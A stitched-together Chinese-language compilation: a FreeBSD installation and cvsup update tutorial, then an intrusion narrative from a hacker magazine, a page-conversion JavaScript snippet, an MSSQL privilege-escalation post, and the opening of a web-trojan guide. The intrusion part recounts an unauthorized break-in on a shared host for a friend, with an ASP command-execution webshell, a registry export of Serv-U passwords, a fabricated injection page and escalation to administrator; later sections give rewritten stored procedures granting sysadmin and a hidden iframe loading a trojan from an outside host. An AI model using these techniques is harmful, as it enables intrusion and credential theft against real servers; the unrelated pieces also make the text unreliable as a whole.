　　从FreeBSD 4.x开始，ufs支持了一个叫做SoftUpdates的技术。SoftUpdates的主要设计目标是提高文件系统性能。除了/所在的slice之外，所有的ufs slice都应打开SoftUpdates，这样对于提高系统整体性能很有好处。(/虽然也是ufs slice，但打开SoftUpdates会造成系统不稳定——FreeBSD文档如此警告，而笔者确实也吃过这个亏。不过，由于/的内容不需要经常变化，不打开SoftUpdates和打开了SoftUpdates几乎没有性能上的差别) 。SoftUpdates可以随时通过tunefs(8)来打开或关闭。在label(8)程序中，打开SoftUpdates的标志是文件系统显示为ufs+s。
　　
　　之后是选择安装介质和要装的Distribution。它提供了几组常见的情况。Minium安装最小系统，包括一些基本的Unix程序。Developer包括了一些开发工具；X-Developer和Kernel-Developer分别是X和内核开发人员用的。此外还有可选的ports，它可以帮助我们来安装应用程序。
　　
　　我通常使用的是Custom(定制安装)，不安装源代码、ports(因为这些可以从cvsup同步得到最新的，安装一遍浪费时间)，只安装XFree86(主要是为了运行cvsup，因为编译不需要X的cvsup需要很长时间，而且很多其他的东西，如php要用到的gd等等，需要XFree86的库文件的支持)、基本系统以及一部分库文件。当然，您也可以根据需要选择安装其他组件。
　　
　　完成之后系统就开始安装了。注意，一旦安装开始，所有前面做的分区、建立文件系统等操作就结结实实地写到了硬盘上，再没有反悔的机会了。如果您的硬盘上包含重要数据，那么请在这之前备份。
　　
　　根据计算机速度的不同，这个过程可能持续10分钟到数小时不等。在此过程中，除了光盘或硬盘出问题之外，基本上不会出现节外生枝的情况。按Alt+F2可以切换到用于调试sysinstall(8)的控制台，Alt+F4可以切换到一个命令行控制台，这些都是调试FreeBSD安装过程，或应付紧急情况的，通常用不到。
　　
　　全部系统文件安装完成之后，sysinstall(8)会给出一个祝贺画面。同时，它也告诉你如何在以后运行sysinstall(8)进行其他操作，如配置等等。实际上，在FreeBSD中sysinstall(8)基本上相当于Windows控制面板的作用。
　　
　　随后可以根据自己的情况配置网络、设置时区、显示字体、XWindow等等，并且创建新的用户(FreeBSD中的内建管理员叫做root，但由于它拥有一切特权，因此完全靠它来做日常工作有时会不太方便，笔者自己就曾不慎以root身分删除了modules，然后战战兢兢地重新编译内核)。



FreeBSD安装盘上还提供了一些packages。这些packages是预先遍一号的应用程序。对于一台拥有很好的Internet连接的、速度足够快的机器来说，并不需要安装packages(KDE和X除外，编译它们各需要花上一天一夜的功夫)。这台机器速度还称不上“足够快”，所以我安装了cvsup，它在devel中。



到目前为止，我们已经安装了FreeBSD的基本系统。由于FreeBSD基本系统中包括很多库文件，并且，这些库文件可能已经被发现存在问题，因此现在立刻安装应用程序或服务(如Apache等等)是不合适的。此后我们将讲解FreeBSD的在线升级(cvsup)、应用程序的安装，以及优化。
　　
　　更新FreeBSD
　　
　　完成了安装、配置，FreeBSD基本上就算装完了。不过，目前为止没有哪个通用操作系统能够保证“bug-free”，FreeBSD也一样。在重新启动之后，我们需要做一些调整；并且，通过重新配置内核，我们可以得到一个更小、更快的操作系统。
　　
　　第一步要做的是同步源代码。FreeBSD是一套开放源代码的操作系统，它的全部源代码都可以通过cvsup与中央cvsup服务器，或它的某个镜像同步。
　　
　　cvsup是一个可选的package，同样的，它也可以从ports里面安装(/usr/ports/devel/cvsup和/usr/ports/devel/cvsup-nogui)。考虑到许多应用程序都依赖X的库文件，在前面安装的部分我安装了它，并且直接安装了cvsup的package。不过，如果你有足够的耐心去一个一个地make需要的ports，那么先安装ports collection，然后make cvsup-nogui也是一个不错的主意，尽管这需要比较长的时间。
　　
　　创建一个用于cvsup(1)的supfile，命名为stable-supfile：
　　
　　(default host中选定的cvsup服务器——ftp.bjpu.edu.cn对访问的IP进行了限制，笔者只在北京工业大学校内使用过，因此如果您无法连接这个服务器，请尝试www.cn.freebsd.org，或cvsup.freebsd.org)
　　
　　*default host=ftp.bjpu.edu.cn
　　*default base=/usr
　　*default prefix=/usr
　　*default release=cvs tag=RELENG_4
　　*default delete use-rel-suffix
　　src-all
　　ports-all tag=.
　　
　　随后执行
　　
　　cvsup -g -L 2 stable-supfile
　　
　　这里需要稍微解释一下reeBSD的几种版本。
　　
　　FreeBSD包括3类分支：-RELEASE，-STABLE和-CURRENT。FreeBSD 3.x、4.x和5.0是目前受到维护的版本，如果你期待稳定运行，那么，可以选择的最新版本将是FreeBSD 4.6-STABLE(如果你是在4.6.2-RELEASE发行之后更新的，那么它实际上比4.6.2-RELEASE新，并且，它正式的CVS tag是RELENG_4，即FreeBSD 4-STABLE)。
　　
　　那么，三类分支有什么区别呢？
　　
　　FreeBSD的开发是非常活跃的。系统中可能会随时引入一些新的特性。最新的代码是在-CURRENT分支中引入的。-CURRENT的修改非常频繁，每天都可能有数百处修改。使用-CURRENT分支的FreeBSD需要耐心和勇气，因为你的系统随时可能崩溃(随着FreeBSD 5.0开发尾声的接近，这种现象已经越来越少)，make world也可能空手而归(没有人保证-CURRENT分支能够正常编译)，此外，这个分支的性能也不好(因为调试的原因，这个分支引入了大量的调试选项，这意味着运行速度不会太快)。当然，正像它的名字那样，-CURRENT分支的版本也是最新的5.0，而且，一切FreeBSD的错误和漏洞的修正都是首先在-CURRENT分支引入的。目前，-CURRENT分支硕果仅存的只有FreeBSD 5-CURRENT(指定cvs tag时写“.”)，这个分支包括了FreeBSD 5.0开发的最新进展。
　　
　　FreeBSD 5中将引入大量的新特性，包括核心级线程(目前FreeBSD中的线程支持仅限于用户级线程，这在多处理器的环境下性能不够好，当然，目前使用fork()来支持的多进程线程模拟能够提供类似核心级线程的功能，但并不是所有的程序员都知道如何使用fork)、完整的Soft Updates(这一变化将提供更好的文件系统性能，同时提供更好的稳定性)，等等。如果你有快速的Internet连接，一台或一些空余的机器(当然，不是生产用的服务器)，并且希望为FreeBSD的开发作贡献，或者你关心操作系统的最新发展，那么，-CURRENT分支是最好的选择。
　　
　　此外，由于-CURRENT分支性能不好、稳定性不够等这些缺点，对于生产的服务器来说，通常运行的应该是FreeBSD-STABLE。如同它的名字那样，FreeBSD-STABLE的目的是“稳定地运行”。-CURRENT分支中的代码，在经过一段时间(通常是7到90天，但安全更新属于特例，通常会在几个小时)的验证之后，符合版本条件(有些新特性只能用于FreeBSD 5.0)的代码会被FreeBSD-STABLE吸收，这个操作称作MFC(Merge From -CURRENT，不是Microsoft Foundation Classes:P)。
　　
　　由于FreeBSD 5.0的第一个RELEASE至今仍然没有发布，因此，目前还没有5.0-STABLE。目前，FreeBSD-STABLE有两个版本，FreeBSD 3-STABLE和FreeBSD 4-STABLE，分别对应3.x和4.x的最新稳定版代码(对应的cvs tag分别是RELENG_3和RELENG_4)。由于版本的更新换代，其中3.x的-STABLE正在逐渐消亡。FreeBSD-STABLE每天平均会修改10个左右的文件。
　　
　　每隔一段时间，FreeBSD的发行工程组(Release Engineering Team)会对FreeBSD-STABLE的源代码树进行锁定。这段时间(目前的规定是30天，之前还有30天准备)内，所有的MFC操作都需要发行工程组的批准，因此，FreeBSD-STABLE在这个阶段基本不会引入任何新的特性。经过这段时间之后，发行工程组会在最后锁定ports树，并build一份所有的package，之后，这份锁定的-STABLE，可能经过若干RC(Release Candidate)，被命名为RELEASE，并制作光盘发行。
　　
　　顾名思义，-RELEASE的设计目标是“发行”。一个版本一旦RELEASE，那么他的功能就不会再增加了。此后的所有维护的目标都只有一个，那就是绝对稳定。如果你和-RELEASE分支同步，那么绝不会出现make无法通过的情况，而且，通常这也可以保证你的系统“绝对”稳定，因为它不会引入任何新功能(例如，4.6就是4.6，如果你想要4.6.2的功能，必须明确地指定4.6.2)。
　　
　　目前，FreeBSD有很多RELEASE版本，它们的cvs tag如下。我个人建议使用最新的4.6.2-RELEASE。
　　
　　对于多数人来说，-RELEASE是一个比较极端的选择。无论何时出现版本升级，如果你想跟进，那都必须修改supfile，如果你选择不跟进，那么就可能造成ports工作异常。如果经常更新，-RELEASE可以保证操作系统本身的安全性，但同其他分支一样，如果ports出了问题，那么也得一块make，而既然这样，还不如使用-STABLE。
　　
　　如果你符合下面的条件，那么RELEASE分支可能比-STABLE分支更适合你
　　
　　你使用的软件对于操作系统的变化非常敏感，比如，它只能FreeBSD 4.5，而无法在4.6上运行；同时，你不打算采用它的更新版本，或者它的作者拒绝更新
　　
　　操作系统的更新对于你来说没有任何意义，比如，你打算把FreeBSD当作一个相对固定的嵌入式操作系统来使用，例如，作为防火墙的一部分
　　
　　更新会对你造成困扰，操作系统的绝大多数新特性对于你来说除了增加烦恼之外，不能带来任何其他东西。-并且，符合以下的全部条件-
　　
　　你每天察看FreeBSD，以及使用的全部软件的安全公告
　　
　　你的Internet连接比较通畅
　　
　　目前我本人维护的所有主机，除了作为防火墙的那台之外，使用的都是FreeBSD-STABLE。
　　
　　一旦同步完源代码，就应该对整个系统进行更新。如果你没有每天察看安全公告的习惯，那就应该关心一下cvsup到底更新了哪些代码。nectar是目前FreeBSD的Security Officer。如果你发现他一下子更新了许多代码，那么对你来说立即make world和kernel很可能是必需的。
　　
　　为了更新整个系统，在/usr/src中执行
　　
　　make world
　　
　　以及
　　
　　make kernel KERNCONF=内核配置文件名
　　
　　当然，也可以连起来执行：
　　
　　make world kernel KERNCONF=内核配置文件名
　　
　　如果你的计算机运行速度较慢，那么，对于基本系统的更新(相当于不包括库的一次world)，可以用make most替代make world，但make world是一个不错的主意，因为它能够保证对C运行环境的改变应用到所有的程序中，如果修正的不是动态连接的C函数库，那么make world可以保证代码的一致性。
　　
　　make kernel是一个需要重新启动的操作。如果你的make world修改了系统的关键服务，那么最好也重新启动一下。我很少有耐心看完make world和kernel的执行，根据系统的运行速度不同，这需要一个小时到一天的时间，而且，不是所有的SSH客户端都能够长时间正确的执行，例如，SecureCRT的多个版本都有内存泄漏问题。为了解决这个问题，我用下面的命令来完成更新：
　　
　　make world kernel KERNCONF=内核配置文件名 clean > /var/log/world,out && reboot &
　　
　　这个命令能够记录更新的全过程，如果在什么地方编译失败，你可以很快地找到原因。对于多数人来说，由于后面的&&，只需要察看uptime就能知道便以是否成功。
　　
　　需要说明的是，FreeBSD的make world并不总能成功。有时需要修改一些环境变量才能成功完成make。为了保证make成功，在/usr/src中执行任何make操作之前，建议你看一眼UPDATING中是否有特殊的要求(这种要求并不是在FreeBSD Release的时候才会出现，很多时候他会在某个CURRENT中引入，然后随着MFC进入-STABLE分支)，并且，在进行大的版本升级之前(跨RELEASE，甚至主版本号)，首先执行下面的命令
　　
　　mergemaster -p
　　
　　并在make world之后执行
　　
　　mergemaster -i
　　
　　运行mergemaster脚本需要一定的Unix配置知识，不过，由于配置文件中包含很多帮助信息，因此，只要master.passwd、group这样的文件不出大问题(如果cvsup更新了master.passwd，那么就需要留神，因为master.passwd标准配置是root口令为空，这时需要用m来合并，而不是使用i安装)，mergemaster并不会引入什么新的问题。
　　
　　前一条命令是更新make的配置(/etc/defaults/make.conf和/etc/make.conf)。对于多数人来说，除非进行跨版本升级，否则一般情况下是不需要这样做的。后一条命令是同步全部配置，并安装以前不存在的配置文件，而不进行提示。
　　
　　笔者曾经遇到过FreeBSD因为系统日期不正确而无法make的情况，因此，再次特别提醒大家，如果你的系统日期不正确，最好是用date命令修改一下，或者干脆用ntpdate或ntpd来同步时间。关于如何使用ntp，将在以后说明。
　　
　　以后我们将讲解FreeBSD内核的配置，以及如何配置make.conf来优化FreeBSD的编译结果。

~~~~~``~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`~~```

Helvin大哥  PS：

几个问题阐述一下
更新cvsup，最好不要从ports编译，这样可能会出现安装一些旧版本的库文件，以后还要upgrade，可以用pkg_add安装
#pkg_add -rv cvsup-without-gui

更新ports可以找到这段，去掉前面的注释
SUP_UPDATE=   yes
SUP=         /usr/local/bin/cvsup
SUPFLAGS=     -g -L 2
SUPHOST=     cvsup.cn.FreeBSD.org
SUPFILE=     /usr/share/examples/cvsup/stable-supfile
PORTSSUPFILE=   /usr/share/examples/cvsup/ports-supfile

然后再/usr/src下面执行make update

简单说下make.conf优化
有很多人对CPU进行编译优化，个人不推荐，只要定义你的CPUTYPE就可以了，其他的没必要做，在文件中有这样一段说明，对照一下你的CPU修改就可以了，过多的CPU优化其实对程序的编译执行速度没有太大帮助
# Currently the following CPU types are recognized:
#   Intel x86 arhitecture:
#     (AMD CPUs)     athlon-mp athlon-xp athlon-4 athlon-tbird athlon k6-3
#               k6-2 k6 k5
#     (Intel CPUs)   p4 p3 p2 i686 i586/mmx i586 i486 i386
#   Alpha/AXP architecture: ev67 ev6 pca56 ev56 ev5 ev45 ev4
#   Intel ia64 architecture: itanium
如果只有IPv4，可以去掉NOINET6=true，。。。。。。

可以用portsupgrade -a更新已经安装的ports
可以用pkg_version -l "<"察看需要升级的ports

文章作者：Andyower 天使娃娃
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注：本文已发表2005年9月的黑客防线.如有转载,请注名

    近日,朋友说要我帮他弄一个站点,说那个站点有许多他想要的资料,他给出了站点www.***d.com,由于一些原因，所以本文有很多的截图都不能提供,希望大家可以谅解.

第一次渗透
    先从主站入手,登陆上去看看,主站上面几乎都是静态的,只有一些新闻,而那些新闻是的注入点是连接到另外的一个IP,220.194.*.*/news.asp?id=111,试一下提交and 1=1,and 1=2,还有"news.asp?id=1'11","news.asp?id=11;1","news.asp?id=11 1","news.asp?id=11--1",全部返回正常,也就是说"'",";","--"," ",已经全部被过滤了,再去220.194.*.*去溜达一下,看见一个论坛,动网的,是前几天刚刚装上去的,注册人数不到50人,为了避免对方是骗人,把建站的日期修改,还是把最新的漏洞测试一下,都不能成功,想跨站?管理员就没有上过论坛.
    这个时候,对www.***y.com扫描的报告出来了,开放21,80,3389,试着ftp上去看看.返回了信息如下:

C:\Documents and Settings\Andyower>ftp www.***d.com
Connected to www.tnbfriend.com.
220-Microsoft FTP for WinSock ready...
220 (欢迎您使用中国万网虚拟主机服务，本空间禁止使用聊天室，江湖游戏，在线视频播
放，专业下载等严重耗用服务器资源的程序,谢谢您的合作!)
User (www.tnbfriend.com:(none)):

显示的是"Microsoft FTP for WinSock ready",小样的,"serv-u',你以为你换了马甲我就不认识你啊,原因是因为出现了"220",一般来说,返回的信息有"220"的,就多半都是"serv-u"了.是万网的虚拟主机,听说万网的虚拟机被人搞过很多次了,不知道现在有没有学乖点呢.先不管这个，既然是虚拟主机,就几乎可以肯定的,一定可以旁注.
    打开Domain3.5,设置好参数,过了没多久出来结果,上面捆绑了非常多的网站,看得我都不想看了,纯粹属于体力活,还好有天使娃娃在,这种事情就交给她吧.让她随便找到一个存在漏洞的网站,得到个webshell再说.(天使娃娃:为什么受伤的总是我......)
    不知道是因为天使娃娃的命好还是人品好,才不到10分钟,就拿下了一个年老失修的动网,并且把一句话木马写好了,就等着我去连接了.我比较喜欢海阳顶端木马,配合起一句话非常的好用。连接上去以后,看见了许多的站点.如图1:
随便点击一个进去看看,发现没有权限,也许是为每个用户都提供了一个帐号吧.再看看其他的东西,发现不能执行cmd,自己上传了一个cmd.exe上去,发现还是不能执行.因为现在我用的这个海洋不是最新的版本,所以没有查看组件的功能,在没有查看组件前,很多的东西都是不能确定的.这次,上传了另外一个海洋,查看组件.如图2:
最重要的2个组件可以用:Shell.Application ,WScript.Shell,也就是说WScript.Shell被改名了,但是还是存在的,这种小事难不到偶滴,马上弄了段代码上去,内容如下
<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
  </ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c "+request("cmd")).stdout.readall%>
</textarea>

提交 cmd.asp?fpath=自己的cmd.exe的路径&cmd=命令.如图3
现在已经可以运行cmd命令了,在这里我想说一下,在组件探测的时候,探测到WScript.Shell不存在也有可能可以执行命令的.在这补充一下,写完这文章的时候,突然发现,其实海洋就直接提供有这个功能了,只是我一直没用到.只要在执行Wscript.Shell的页面,点击使用Wscript.Shell,然后在下面的命令框下写自己的cmd.exe的路径写上去,例:
"f:\usr\cn23002\bbs\UploadFile\2005-5\cmd.exe /c netstat -an",这个效果和我用的效果是一样的.(在此感谢Lcx大哥提供那么好用的马儿).
    在netstat -an的时候.有一条值得注意'TCP   127.0.0.1:43958     0.0.0.0:0         LISTENING",和想象中的一样,既然是这样子,把早就准备好了的serv-u本地提升权限的程序弄上去,试了几个都不能成功,难道说密码改了?前面我已经试过跳转目录,在"C:\Documents and Settings\All Users\「开始」菜单\程序\"找到了serv-u的目录,并且下载了快捷方式,得到路径以后,尝试跳到serv-u的目录,已经试过了,不能的跳转,做了限制.就这样的放弃了?不能,当然不能了,都做到这一步了,放弃了太可惜了.不知道大家记得不记得6月的黑防,下雨天[F.S.T]写的那篇文章:"serv_u FTP 再暴本地权限提升漏洞",也许很多人没有注意到吧,可能是因为觉得局限性非常的小,但是,我可以告诉你们,成功率高达80%,为什么呢?因为现在的虚拟主机商都怕了serv-u本地权限提升漏洞,所以,他们很都的管理员都是把密码存放在注册表里面,也就是说,符合了下雨天文章所说的要求,帐号和密码存放在注册表里面.不记得的读者们请重新的翻开书来看看吧.我也不想废话那么多,直接看怎么实现的吧,在webshell那,执行命令:regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\" ,就会把注册表的中的serv-u的帐号密码全部的导出到了C:\Documents and Settings\All Users\Documents\system.ini这个文件里面,当然了前提是:C:\Documents and Settings\All Users\Documents\ 这个文件是可写的,如果不能写的话,自己换一个可以写的目录吧.然后下载system.ini文,打开一看!呆了!如图4:
所有的人的帐号密码都是明文的,在这里想说一下,因为我们的权限是Guests的,所以是根本没有权限往注册表里面写入一个管理员的帐号和密码,而且为了证明自己的想法,偶也在本机测试过,在Guests下,是没有任何权限往注册表修改或者是添加删除的.很多的办法都试过了,还是不行.跳转到c:\winnt\下，非常多的KB*.log文件,这些都是补丁的日志,最新的一个补丁就是在昨天打的,也许是因为开启了windows自动更新的功能,我猜想管理员才不会那么的勤快.
    现在我们已经有了所有用户的ftp帐号和密码,关键就是找到ftp帐号密码所对应的网站了,但是他的网站的目录都是按顺序的,从目录根本没有办法猜到哪个目录对应着哪个网站,400多个站点啊!一个个手工的测试的话,会让人疯掉的.我现在休息一下.体力活,让天使娃娃来吧.(天使娃娃:为什么受伤的又是我......)至于在得到所有ftp帐号和密码的情况下怎么知道哪个ftp对应的是哪个网站,我也说说吧,先找出目标网站的特殊一点的网页名字,然后一个个帐号密码的登陆,用ls命令来查看,是不是存在那个文件,如果不存在就下一个,如果存在,还要再仔细的查看其他的文件,是不是都符合要求,存在不存在那个站点的其他的文件.晕了吧,没事,实例说明一切.
    先上www.***d.com网站,找几个特殊的文件,在这里,我找到的是http://www.***d.com/sqrd.htm,还有http://www.***d.com/yuq.htm.得到文件名,sqrd.htm还有yuq.htm,然后从cn23001这个帐号开始,用得到的帐号和密码登陆,登陆进去以后，发现没有sqrd.htm文件的就直接跳过去了,如果存在sqrd.htm文件,再看看有没有yuq.htm文件.如果都存在,说明很大可能就是这个ftp帐号了,对了,还忘记说了一下，在system.ini文件里面,重要的就是2样东西.第一个:[HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\\Domains\1\UserSettings\cn23017] ,帐号就是cn23017,第二:密码就是在下面的"Password"=这里是密码,一个个的慢慢试吧.我去睡觉了,累死了.
    一觉醒来,天使娃娃很郁闷的对我说,还是没有找到,他都试到了cn23217了,已经累得不行了,上网查查有没有相关的软件,查不到,算了,还是我们伟大的领袖毛主席说得好,自己动手丰衣足食.自己写一个程序来针对性的暴力破解吧.花了点时间把程序写好,程序界面如下图5:
界面是难看了一点,因为赶时间嘛,写个程序花了半个多小时,再美化的话又要花几个小时了,简直是浪费时间.能用就可以啦.说名一下,"ftp主机名"不用说了吧.对方的ftp的地址,"特殊文件名"填写的是要得到的ftp对应的网站的特殊文件名,这个已经在文章中说名了的."从第几个ftp帐号开始...",这个地方,按照自己的要求来写,因为偶在测试的时候,有的时候读取到100多个,程序就挂了,如果重新开始又太麻烦,所以就加上这个选项,防止程序挂了以后，不用重新开始读取,默认写1就可以了,意思是从文件中的第一个ftp帐号开始测试,其他的就不用写啦,就等着帐号出来吧.还有一点，因为为了节约时间.我没有用到多线程,所以就自动跳出对话框来代替了多线程,防止程序死锁.等下次有时间或者是有人觉得好用,我再完善吧.现在就这样将就着先吧.下面是我的测试.如图6:
我是从第4个帐号开始读取,当登陆的ftp下存在index.asp这个文件的时候,就会把帐号和密码再列出来,方便吧.到了这里也许会有人问,万一有几个网站都存在着一样的特殊文件名呢?呵呵,这个时候,就需要自己动一下手啦,不能那么懒的.
    不到几分钟,已经测试完了,其中的一个帐号存在着我写的特殊的文件名,就他了.手工ftp进去看看,完全就是这个站点了，小样的，www.***d.com,你以为你躲着深我就找不到你了啊!哈哈!一样让你跑不掉!ls命令看看.发现一个conn.asp文件,打开来看看，既然是另外一个主机的连接信息:
<%
dim conn  
dim connstr
connstr="provider=sqloledb;driver={SQL SERVER};server=220.194.*.*;uid=j****;pwd=d******;database=d*****;"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>

再次渗透

    这次万网害死人了吧!既然让我得到了要进攻的网站的另外一台服务器.220.194.*.*,这台服务器是独立的,旁注过,没有成功,因为不存在另外的网站,这一次,看你往哪跑,一起把他拿下!因为有些原因,从现在开始不提供截图了,希望可以谅解.既然已经得到了数据库的帐号密码,而且他的网站是直接用asp连接上去的，这样说,一定会开了ms sql的端口的.用sql器连接上去,发现自己的权限是db_owner的权限，很多命令不能用，自己手工读去对方的web路径又太麻烦了,而且我也想看看他的结构,既然我有了sql帐号的密码.他的服务器上没有注入漏洞,我可以帮他伪造一个,伪造一个注入点，然后用nbsi来猜解其他的信息,速度会快很多的.
    偶马上就在本地架设了一个IIS,然后把他的conn.asp文件弄到我的虚拟目录下.再构造一个存在注入点的文件a.asp,里面的admin表是存在的,代码如下:
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id   '如果没有这个表,可以自己建立一个表和字段
rs.open strSQL,conn,1,3
rs.close
%>
完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录,web目录在d:\wwww,还装了serv-u,这个服务器因为是自己的，所以不会那么专业吧,应该不会设什么防的.先得到webshell再说,db_owner的权限可以备份数据库,我用xiaolu的getwebshell.exe,备份数据库文件到d:\www\1.asa,结果不能运行!出错!原来该死的数据库中存在<% 这个东西,没办法，运气一向不是很好,这次又是个很好的理由.慢慢的找到数据库中看哪个字段存在<%的内容,删除!
    又花了半个小时找出来了，用SQL语句把他删除,再备份,这次成功了.成功的拿到webshell,觉得不好看的，重新写一个webshell进去吧,接着就是serv-u提升权限,添加一个帐号,设置成为管理员,3389登陆进去,爽死了!什么都有了，把帐号密码给朋友吧,他爱怎么搞是他的事情了,我的任务已经完成.

注意：由于本文图片为引用 为了避免图片失效 上传含图pdf附件提供大家下载 欢迎使用adobe 生成PDF文件可以较好的保护您的版权 您可以同步发出含图主题和PDF 不用担心别人转载文章删除您的附加信息 因为还有PDF可以说明一切


附件: ftp.rar (6 K)
附件: 万网我进来玩过两次了.rar (407 K)

首先在http://www.mh.fy.cn/soft/transform.js 下载这个简繁转换的网页，拷贝到网页目录，在需要转换的网页中，加入如下代码：

<script type="text/javascript" language="javascript" src="transform.js"></script>
<script type="text/javascript" language="javascript">
function s2t()
{document.body.innerHTML=document.body.innerHTML.s2t();}
function t2s()
{document.body.innerHTML=document.body.innerHTML.t2s();}
</script>

然后在网页的适当位置添加简繁转换链接：<a href="javascript:s2t()">繁体中文</a> <a href="javascript:t2s()">简体中文</a>

然后保存页面即可

信息来源：ZZ


不知道大家看过这篇文章没有，可以在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。具体方法如下：先输入drop procedure sp_addlogin,然后在IE里面输入create procedure sp_addlogin
  @loginame sysname
  ,@passwd       sysname = Null
  ,@defdb       ; ; sysname = ’master’     -- UNDONE: DEFAULT
CONFIGURABLE???
  ,@deflanguage   sysname = Null
  ,@sid   varbinary(16) = Null
  ,@encryptopt varchar(20) = Null
AS
  -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
Declare @ret   int   -- return value of sp call
 
  -- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount 〉 0)
begin
raiserror(15002,-1,-1,’sp_addlogin’)
return (1)
end
  -- VALIDATE LOGIN NAME AS:
  -- (1) Valid SQL Name (SQL LOGIN)
  -- (2) No backslash (NT users only)
  -- (3) Not a reserved login name
execute @ret = sp_validname @loginame
if (@ret 〈〉 0)
    return (1)
  if (charindex(’\’, @loginame) 〉 0)
  begin
    raiserror(15006,-1,-1,@loginame)
    return (1)
  end
--Note: different case sa is allowed.
if (@loginame = ’sa’ or lower(@loginame) in (’public’))
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end
  -- LOGIN NAME MUST NOT ALREADY EXIST --
if exists(select * from master.dbo.syslogins where loginname =
@loginame)
begin
raiserror(15025,-1,-1,@loginame)
return (1)
end
-- VALIDATE DEFAULT DATABASE --
IF db_id(@defdb) IS NULL
begin
raiserror(15010,-1,-1,@defdb)
  return (1)
end
-- VALIDATE DEFAULT LANGUAGE --
IF (@deflanguage IS NOT Null)
begin
Execute @ret = sp_validlang @deflanguage
IF (@ret 〈〉 0)
  return (1)
end
ELSE
begin
select @deflanguage = name from master.dbo.syslanguages
where langid = @@default_langid --server default
language
if @deflanguage is null
  select @deflanguage = N’us_english’
end
-- VALIDATE SID IF GIVEN --
if ((@sid IS NOT Null) and (datalength(@sid) 〈〉 16))
begin
raiserror(15419,-1,-1)
  return (1)
end
else if @sid is null
select @sid = newid()
if (suser_sname(@sid) IS NOT Null)
begin
raiserror(15433,-1,-1)
  return (1)
end
-- VALIDATE AND USE ENCRYPTION OPTION --
declare @xstatus smallint
select @xstatus = 2 -- access
if @encryptopt is null
select @passwd = pwdencrypt(@passwd)
else if @encryptopt = ’skip_encryption_old’
begin
select @xstatus = @xstatus | 0x800, -- old-style
encryption
  @passwd = convert(sysname, convert(varbinary
(30), convert(varchar(30), @passwd)))
end
else if @encryptopt 〈〉 ’skip_encryption’
begin
raiserror(15600,-1,-1,’sp_addlogin’)
return 1
end
  -- ATTEMPT THE INSERT OF THE NEW LOGIN --
INSERT INTO master.dbo.sysxlogins VALUES
    (NULL, @sid, @xstatus, getdate(),
        getdate(), @loginame, convert(varbinary(256), @passwd),
        db_id(@defdb), @deflanguage)
if @@error 〈〉 0 -- this indicates we saw duplicate row
    return (1)
-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE
SYSLOGINS CHANGE --
exec(’use master grant all to null’)
  -- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
return (0) -- sp_addlogin
GO
OK,我们新建个用户exec master..sp_addlogin xwq

再drop procedure sp_addsrvrolemember,然后在IE里输入


create procedure sp_addsrvrolemember
  @loginame sysname,   -- login name
  @rolename sysname = NULL -- server role name
as
  -- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
declare @ret     int,   -- return value of sp call
        @rolebit   smallint,
        @ismem     int
  -- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount 〉 0)
begin
raiserror(15002,-1,-1,’sp_addsrvrolemember’)
return (1)
end
 
  -- CANNOT CHANGE SA ROLES --
  if @loginame = ’sa’
  begin
    raiserror(15405, -1 ,-1, @loginame)
    return (1)
  end
  -- OBTAIN THE BIT FOR THIS ROLE --
  select @rolebit = CASE @rolename
        WHEN ’sysadmin’       THEN 16
        WHEN ’securityadmin’   THEN 32
        WHEN ’serveradmin’     THEN 64
        WHEN ’setupadmin’     THEN 128
        WHEN ’processadmin’   THEN 256
        WHEN ’diskadmin’     THEN 512
        WHEN ’bcreator’     THEN 1024
  WHEN ’bulkadmin’ THEN 4096
        ELSE NULL END
  -- ADD ROW FOR NT LOGIN IF NEEDED --
if not exists(select * from master.dbo.syslogins where
loginname = @loginame)
  begin
    execute @ret = sp_MSaddlogin_implicit_ntlogin @loginame
    if (@ret 〈〉 0)
  begin
    raiserror(15007,-1,-1,@loginame)
    return (1)
  end
  end
  -- UPDATE ROLE MEMBERSHIP --
  update master.dbo.sysxlogins set xstatus = xstatus | @rolebit,
xdate2 = getdate()
  where name = @loginame and srvid IS NULL
-- UPDATE PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE
SYSLOGINS CHANGE --
exec(’use master grant all to null’)
raiserror(15488,-1,-1,@loginame,@rolename)
  -- FINALIZATION: RETURN SUCCESS/FAILURE
return (@@error) -- sp_addsrvrolemember
GO

接着再exec master..sp_addsrvrolemember xwq,sysadmin
这样就建立了一个SA用户了，用SQL连接器连接上就OK了

信息来源：黑客基地

--------------------------------------------------------------------------
先说明一点，不是怎么教大家挂马，是让你学会挂马，怎么防守，怎么找马，怎么找关键字，怎么让你学会别人是通过什么方法挂到你的网站上的..
有利就有弊，随便怎么看吧。
--------------------------------------------------------------------------

这里我拿挂首页index.asp来举例子。
　　
　　先说一说，得到webshell的挂马方法
　　一般的挂马的都是用框架，这是最基本的挂马方式，只要不破坏原有的语言逻辑，那就想插入哪里就写哪里了，最基本的语句当然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>，其中http://www.fucksb.net/mm.htm是我们的木马，下面就不一个一个提示了。
 
